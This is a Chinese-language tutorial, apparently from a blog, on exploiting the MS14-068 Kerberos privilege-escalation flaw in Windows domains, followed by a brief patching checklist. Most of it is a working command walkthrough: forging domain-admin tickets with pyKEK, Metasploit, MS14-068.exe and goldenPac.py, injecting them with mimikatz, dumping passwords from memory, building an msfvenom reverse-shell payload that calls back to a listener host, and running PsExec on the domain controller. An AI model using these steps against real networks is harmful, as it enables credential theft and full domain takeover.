内网安全之:MS14-068 Kerberos 域用户提权漏洞
内网安全之:MS14-068 Kerberos 域用户提权漏洞
0 漏洞说明 (MS14-068;CVE-2014-6324)
官方说明:Microsoft Security Bulletin MS14-068 - Critical | Microsoft Docs
漏洞利用条件:受该漏洞影响的操作系统,包括Win2003、Wind2008、Win2008 R2、Win2012和 Win2012 R2。利用该漏洞如果攻击者获取了域内任何一台计算机的Shell 权限,同时知道任意域用户名、SID、密码。将允许攻击者将域内任意用户权限提升至域管理级别。
漏洞产生原因:用户在向 Kerberos 密钥分发中心( KDC)申请 TGT (由票据授权服务产生的身份凭证)时,可以伪造自己的Kerberos 票据。如果票据声明自己有域管理员权限,而在处理该票据时未验证票据的签名, 那么返给用户的 TGT 就使普通域用户拥有域管理员权限。该用户可以将 TGT 发送到 KDC,KDC的 TGS (票据授权服务)在验证TGT后,将服务票据(Service Ticket)发送给该用户,而该用户拥有访问任何该服务的权限,从而使攻击者可以访问域内的资源。
详细原理解析:MS14-068(CVE-2014-6324)域控提权利用及原理解析 - 紅人 - 博客园 (cnblogs.com)
1 pyKEK 工具包
pyKEK (Python Kerberos Expoitation Kit)是利用Kerberos协议进行渗透测试的工具包,使用PyKEK可以生生成一张高权原的服务票据,并通过mimikatz将服务票据注人内存。PyKEK 运行在Python 2.7环境。使用PyKEK,可以将Python文件转换为可执行文件。
# ms14-068.py 脚本说明
-u <userName>@<domainName>:域用户名@域名。
-s <userSid>: 域用户SID。
-d <domainControlerAddr>:域控制器地址。
-p <clearPassword>: 明文密码。
--rc4 <ntlmHash>:在没有明文密码的情况下,通过NTLM Hash登录。 # 查看域控制器是否安装针对 MS14-068 ( CVE-2014-6324 )漏洞提供的补丁为 KB3011780
wmic qfe get hotfixid # 查看域用户 SID
whoami /user
# 查看域内所有用户 SID
wmic useraccount get name,sid # 生成高权限票据
python.exe ms14-068.py -u test02@test.lab -s S-1-5-21-3884001349-2725517725-626265054-1108 -d 10.1.1.21 -p Admin123 # 查看注入前是否有通过 IPC 可以访问域控制器的目录权限
dir \\dc\c$ # 清除内存中的所有票据,并将高权限票据注入内存
kerberos::purge
kerberos::ptc "TGT_test02@test.lab.ccache" # 查看注入前是否有通过 IPC 可以访问域控制器的目录权限
dir \\dc\c$
2 MSF 中 ms14_068 利用
# 利用 msf 生成高权限票据
auxiliary/admin/kerberos/ms14_068_kerberos_checksum
# 由于msf 不支持 bin 文件写入,要使用 Mimikatz 对文件进行格式转换
kerberos::clist "20211208211852_default_10.1.1.21_windows.kerberos_341121.bin" /export
# 生成一个反弹 shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.1.1.17 lport=4444 -a x64 -f exe > Desktop/evil17.exe
# kali 中监听反弹 shell 链接
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
# 在反弹 shell 中导入票据
getuid
load kiwi
kerberos_ticket_use /home/kali/Desktop/0-00000000-test02@krbtgt-TEST.LAB.kirbi
background
# 利用高权限票据提权
use exploit/windows/local/current_user_psexec
set technique PSH
set rhosts 10.1.1.21
set session 1
run
getuid
3 MS14-068.exe
项目地址:SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 (github.com)
利用条件:
- 域控没有打MS14-068的补丁(KB3011780)
- 拿下一台加入域的计算机,并拥有此计算机的域用户密码和Sid
# 获取 SID
# 如果当前用户为域用户
whoami /user
test\test02 S-1-5-21-3884001349-2725517725-626265054-1108
# 本地用户:管理员权限下用 mimikatz 抓取本地的域用户密码,域用户与SID
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" # 利用ms14-068.exe 工具生成伪造的kerberos协议认证证书
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
MS14-068.exe -u test02@test.lab -p Admin123 -s S-1-5-21-3884001349-2725517725-626265054-1108 -d 10.1.1.21 # 利用mimikatz.exe将证书写入,从而提升为域管理员
mimikatz.exe "kerberos::ptc TGT_test02@test.lab.ccache" # 写入成功后,使用PsExec.exe以管理员权限运行连接域控
PsExec64.exe \\dc cmd.exe
4 goldenPac.py
goldenPac.py是一个用于对Kerberos进行测试的工具,它集成在impacket/examples
下。
python goldenPac.py 域名/域成员用户:域成员用户密码@域控制器地址
# kali 下安装 Kerberos 客户端
apt-get install krb5-user -y
# goldenPac.py 是通过 PsExec 获取域控制器的Shell,会产生大量日志,另外 PsExec 文件容易被杀软查杀,可行性不高。
5 Ticket 传递攻击特点
- Ticket 文件注入内存的默认有效时间为 10 小时
- 使用 dir 命令时,务必使用主机名,如果使用 IP 会报错
- 目标主机上,不需要管理员权限也可进行 Ticket 传递攻击
6 防范 Kerberos MS14-068 漏洞
- 开启Windows Update功能,进行自动更新。
- 手动下载补丁包进行修复。
- 对域内账号进行控制,禁止使用弱口令,及时、定期修改密码。
- 在服务器上安装反病毒软件,及时更新病毒库。
最新文章
- 关于 DevExpress.XtraTreeList.TreeList 树形控件 的操作
- c#通用递归生成无限层级树
- PHP 7.1 新特性一览
- 【CC评网】2013.第44周 把握每天的第一个小时
- c# win form 显示支付宝二维码图片
- 本地替换文件读取MYSQL密码
- HDOJ ——统计难题
- PIL参考手册
- selenium 怎么处理display:none
- Android:Drag and Drop的应用
- 经Apache将tomcat转用80port这两个域名
- 什么是PROFINET IO系统的实时性
- Leetcode Pasacl&#39;sTriangle
- HTML5与phonegap接口对比
- 解决 Chrome 下载不了东西 失败 - 已屏蔽 的问题
- Jupyter notebook安装
- Delphi读取不Word中不规则表格数据并转换成标准表格
- 由于html元素加载导致的问题
- NS3 fifth.cc 拥塞窗口实例
- tp5在apache下能访问,但放到nginx下报404
热门文章
- 24V转5V,24V转3.3V稳压芯片的电路图,,PCB和BOM
- 如何使用Java获取货币符号?
- 时间片差分调度法-充分利用MCU的资源
- 实现 .Net 7 下的数据库定时检查
- easygui 之integerbox()、enterbox()、multenterbox() 三种输入函数的使用
- C++进阶(unordered_set+unordered_map模拟实现)
- .gitignore文件配置以及gitee提交报Push rejected...错误解决
- 阿里云Imagine Computing创新技术大赛决赛启幕!
- [LeetCode]数组拆分 I
- 腾讯微信开源数据库PhxSQL简单部署记录